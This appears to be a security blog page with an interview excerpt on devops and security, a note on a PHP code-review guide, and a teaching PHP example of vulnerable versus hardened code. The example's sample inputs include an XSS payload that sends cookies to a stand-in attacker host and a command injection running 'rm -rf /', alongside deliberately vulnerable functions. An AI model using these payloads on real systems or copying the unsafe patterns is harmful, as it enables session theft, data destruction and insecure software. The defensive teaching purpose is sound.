The Myth of Devops as a Catalyst to Improve Security

Did an interview with George Hulme about Devops and Security


Muntner: Thinking security testing through and automating as much as possible will yield results, but that can happen with or without devops. I’m not saying devops is invalid, rather that it alone is not responsible for good outcomes. Thinking that an approach delivers more than it really does is only a false sense of security, arguably worse than awareness of insufficient security.

Secure systems and software development practices like command-safe APIs, network-layer features in TLS, HTTP layer features like CSP, improvements in application and protocol layer firewalls, developers learning to do proper encoding for the appropriate output context, automated testing with tools like OWASP ZAP or commercial equivalents as appropriate for the type of application are all high-impact but have nothing to do with devops. Security should be part of the flow, an integral part of QA, security and functional testing.

Muntner: Security isn’t a state, it’s a process. It’s a verb, not a noun. Security ‘what’ should be part of the workflow? Security activities and tests, personnel, all of the above? Should a security organization report to the business management and governance side of management, or the technical side? And why is DevOps better for security maturity than separation of duties?


How To Review PHP Code for Vulnerabilities

This document, when completed, is intended to help PHP developers learn to review code for security issues, and to help experienced code reviewers evaluate PHP applications faster, better, and more repeatably.

My preferences favor open source software. As far as IDEs go, I have found Eclipse to be a very powerful code review tool. I’ve started documenting the process of configuring and using it, in a task-focused way, to assist the reviewer to perform common code review activities.

The page linked below will be regularly updated as I write more, and as I incorporate suggestions from others. It will probably finally reside on a Mozilla Developer Network page.

If you can suggest changes or additions to the doc above, please comment below. Thanks!
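Two of the practices named in the interview above, encoding for the output context and using command-safe APIs instead of string-built shell commands, are also exactly the kind of before/after pairs a PHP code reviewer is hunting for. The following is an added example written for this page; it is not code from the original post, from the review document, or from any project. It assumes PHP 7.4 or later (for the argv form of proc_open(), JSON_THROW_ON_ERROR and typed parameters), and the function names and the inputs at the bottom are constructed for illustration.

```php
<?php
// Added example, not from the original post. Function names and sample
// inputs are constructed for illustration; assumes PHP >= 7.4.
declare(strict_types=1);

// ---- Output encoding: one encoding reused across contexts vs. per-context ----

// Vulnerable: the same HTML-body encoding is reused for an attribute, a URL
// and a JS string. ENT_COMPAT is passed explicitly so the example behaves the
// same on every PHP version: single quotes are left alone, so a value placed
// in a single-quoted attribute or JS string literal can break out of it.
function render_unsafe(string $name, string $nextUrl): string
{
    $h = htmlspecialchars($name, ENT_COMPAT, 'UTF-8');
    return "<p>Hello $h</p>"
         . "<a href='/next?to=$nextUrl'>next</a>"        // raw value in URL attribute
         . "<script>var user = '$h';</script>";          // HTML encoding is wrong for JS
}

// Hardened: encode each value for the context it actually lands in.
function render_safe(string $name, string $nextUrl): string
{
    // HTML body / double-quoted attribute: encode both quote kinds and
    // replace invalid UTF-8 instead of returning an empty string.
    $html = htmlspecialchars($name, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    // URL query component: percent-encode the parameter value.
    $urlParam = rawurlencode($nextUrl);
    // JS string literal: JSON-encode and hex-escape characters that could
    // close the <script> element or the literal; throw on invalid input.
    $js = json_encode(
        $name,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
    return "<p>Hello $html</p>"
         . "<a href=\"/next?to=$urlParam\">next</a>"
         . "<script>var user = $js;</script>";
}

// ---- Command execution: shell string vs. command-safe API ----

// Vulnerable: user input concatenated into a line that would be handed to
// shell_exec()/exec(); a ';' or '$(...)' in $host runs arbitrary commands.
function ping_command_unsafe(string $host): string
{
    return 'ping -c 1 ' . $host;
}

// Hardened: validate the value against what it is supposed to be, then build
// an argv array. proc_open() accepts such an array directly (PHP >= 7.4) and
// bypasses the shell entirely, so no metacharacter in $host is interpreted.
function ping_command_safe(string $host): array
{
    $isHostname = filter_var($host, FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME) !== false;
    $isIp       = filter_var($host, FILTER_VALIDATE_IP) !== false;
    if (!$isHostname && !$isIp) {
        throw new InvalidArgumentException('host must be a hostname or IP address');
    }
    return ['ping', '-c', '1', $host];
}

// Constructed inputs showing the difference a reviewer should be able to spot.
$xss  = "x'; fetch('//attacker.example/?c=' + document.cookie); //";
$cmd  = 'example.com; rm -rf /';

echo render_unsafe($xss, 'a&b'), "\n";   // JS literal is closed by the single quote
echo render_safe($xss, 'a&b'), "\n";     // quote becomes \u0027, URL '&' becomes %26
echo ping_command_unsafe($cmd), "\n";    // "ping -c 1 example.com; rm -rf /"
try {
    ping_command_safe($cmd);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
echo implode(' ', ping_command_safe('example.com')), "\n";
```

When reviewing, the grep-able signals are the same as the ones contrasted here: htmlspecialchars() without ENT_QUOTES, values dropped into href/src or into <script> with HTML encoding or none, and any shell_exec()/exec()/system()/backtick call whose argument is built by concatenation rather than passed through escapeshellarg() or, better, an argv array.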